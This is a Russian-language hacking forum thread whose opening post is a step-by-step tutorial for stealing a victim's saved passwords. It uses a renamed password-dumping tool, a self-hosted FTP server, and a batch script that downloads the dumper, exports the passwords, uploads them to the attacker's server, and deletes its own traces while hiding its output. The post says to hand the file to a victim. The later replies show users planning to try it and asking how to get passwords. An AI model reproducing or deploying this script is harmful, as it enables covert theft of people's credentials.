призрачный форум

www.prizrak.ws

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » www.prizrak.ws » Интернет - Безопасность! » Воровство паролей через bat файл. >>


Воровство паролей через bat файл. >>

Сообщений 1 страница 8 из 8

1

Всем привет!
В этой статье вы узнаете, как можно получить пароли жертв через bat файл, и как от этого защитится, если уже знаете, можете не читать.
Начнем!
  ;)

Для начала нам понадобится обычный текстовый редактор, я воспользуюсь обычным блокнотом (Пуск->Выполнить->notepad), запускаем. Так теперь нам надо скачать программку PassView Pro (обычная версия не подойдет, только pro), скачать мы ее можем здесь. Скачали, теперь переименуйте её, например у меня будет “passexport.exe”. Давайте создадим папку(где хотите), у меня она будет находится “c:\temp”. Создали? Теперь кидаем туда “passexport.exe” (PassView Pro).
Дальше нам надо скачать ftp сервер, я возьму “Pablo’s ftp server”, на мой взгляд он простенький, и полностью подходит для этого дела. Качаем его отсюда, у меня он будет находится в “c:\ftp”. Теперь надо настроить его. Запускаем ftpserver.exe, жмем вкладку “server”, выбираем там “User Account Wizard”. В поле “account name” пишем “ftpuser”, жмем “далее”. В поле “password” напишем “12345” и повторим это в поле “confirm password”, теперь жмем “далее”. Теперь нам надо указать папку, которая будет открыта этому пользователю, я создавал в диске c:\, указываю “c:\temp”, жмём “далее”. Отмечаем галочки “Allow download скачать”, “Allow Upload”, жмем далее и готово! Все, настройка фтп сервера закончена! Теперь нам понадобится текстовый редактор, он у нас уже открыт. Пишем в него:

Код:
@echo off
Echo open xxx.xxx.xxx.xxx>go.txt&&echo ftpuser>>go.txt&&echo 12345>>go.txt&&echo get passexport.exe>>go.txt&&echo bye>>go.txt
Echo open xxx.xxx.xxx.xxx>send.txt&&echo ftpuser>>send.txt&&echo 12345>>send.txt&&echo send pass.txt>>send.txt&&echo bye>>send.txt
ftp -s:go.txt > nul
passexport.exe pass.txt
ftp -s:send.txt > nul
del go.txt send.txt passexport.txt pass.txt name.bat

Теперь я объясню каждую делать этого кода.
xxx.xxx.xxx.xxx - IP фтп сервера
Echo – записывает текст
> - указывает какой файл создать
>> - в какой дописать
&& - тоже самое, что запитая в русском языке =)
ftp – фтп клиент встроенный в windows
-s: - открывает сценарий
del go.txt send.txt passexport.txt pass.txt name.bat - это строчка указывает, какие файлы удалить после запуска файла, она удалит все за собой, в том числе и себя. (измените name.bat на свое название, когда вы сохраните в .bat файл)
> nul – скрывает записи от пользовательских глаз

Сохраняем в name.bat и даем жертве! после того как жертва запустит этот файл, к вам в папку, которую вы указали для пользователя, в настройках фтп, прейдет текстовый файл с паролями(в статье я указывал c:\temp).

Вот вроде и все! Что бы уберечь себя от таких приколов, просматривайте код .bat файла, прежде чем его запускаете.
Статья предназначена для ознакомительных целей, за последствия не отвечаю!

Авторские права принадлежат modest, 12.10.06. (modest@xaker.ru)

Подпись автора

^_^
Кто продает?! - Мы продаем! Забиваем, продаем!!!

0

2

над будет поверить этот способ))

Подпись автора

Скачать!
Хентай:
Очень качественый хентай
Надоел хентай? Попробй это
Невидимка
3D Хентай с какими-то мутантами и прочей нечистью
Аниме:
Devil May Cry/И дьявол может плакать

https://lines.akusherstvo.ru/lineika/431389.gif

0

3

А это работает хоть или нет?

0

4

Я щяс тестить буду :)
ток вот тут мешает серый IP который дал мне провайдер, но мешает не сильно, создаём сайт на юкоз.ру и получаем фтп)))
чуть позже отпишу как получилось, будем надееться что всё пройдёт глатко))
да поможет мне DELит
Enter

Подпись автора

Скачать!
Хентай:
Очень качественый хентай
Надоел хентай? Попробй это
Невидимка
3D Хентай с какими-то мутантами и прочей нечистью
Аниме:
Devil May Cry/И дьявол может плакать

https://lines.akusherstvo.ru/lineika/431389.gif

0

5

Самое сложное это найти PassView Pro, везде дофига не pro версий а pro нету вообще не где.... Этот способ я во время поиска нашёл ещё раз 20 и все указывают на одно и тоже место откуда можно скачать, а скачать не получаеться(((

Если кто найдёт pro версию, огромная прозьба, скинте на мыло Vinosh@mail.ru или в ЛС отпишите где нашли, буду очень благодарен

Подпись автора

Скачать!
Хентай:
Очень качественый хентай
Надоел хентай? Попробй это
Невидимка
3D Хентай с какими-то мутантами и прочей нечистью
Аниме:
Devil May Cry/И дьявол может плакать

https://lines.akusherstvo.ru/lineika/431389.gif

0

6

а можно что нить попробывать если строка являеться таковой

0

7

<tr><td class=td3>Логин:</td><td align=center><input tabindex=1 class=input name=name type=text style='width: 90px'></td>
  <td rowspan=2 align=left><input type=image src=img/enter.jpg width=87 height=28 style="cursor:hand;"></td>
  <td rowspan=2><a href=reg.php>Регистрация</a><br><a href=forgot.php>Забыли пароль?</a></td></tr>
  <tr><td class=td3>Пароль:</td><td align=center><input tabindex=2 class=input name=pasw type=password style='width: 90px'></td></tr>
  </form></table></td></tr>

0

8

есть ли возможность получение каких либо паролей?

0


Вы здесь » www.prizrak.ws » Интернет - Безопасность! » Воровство паролей через bat файл. >>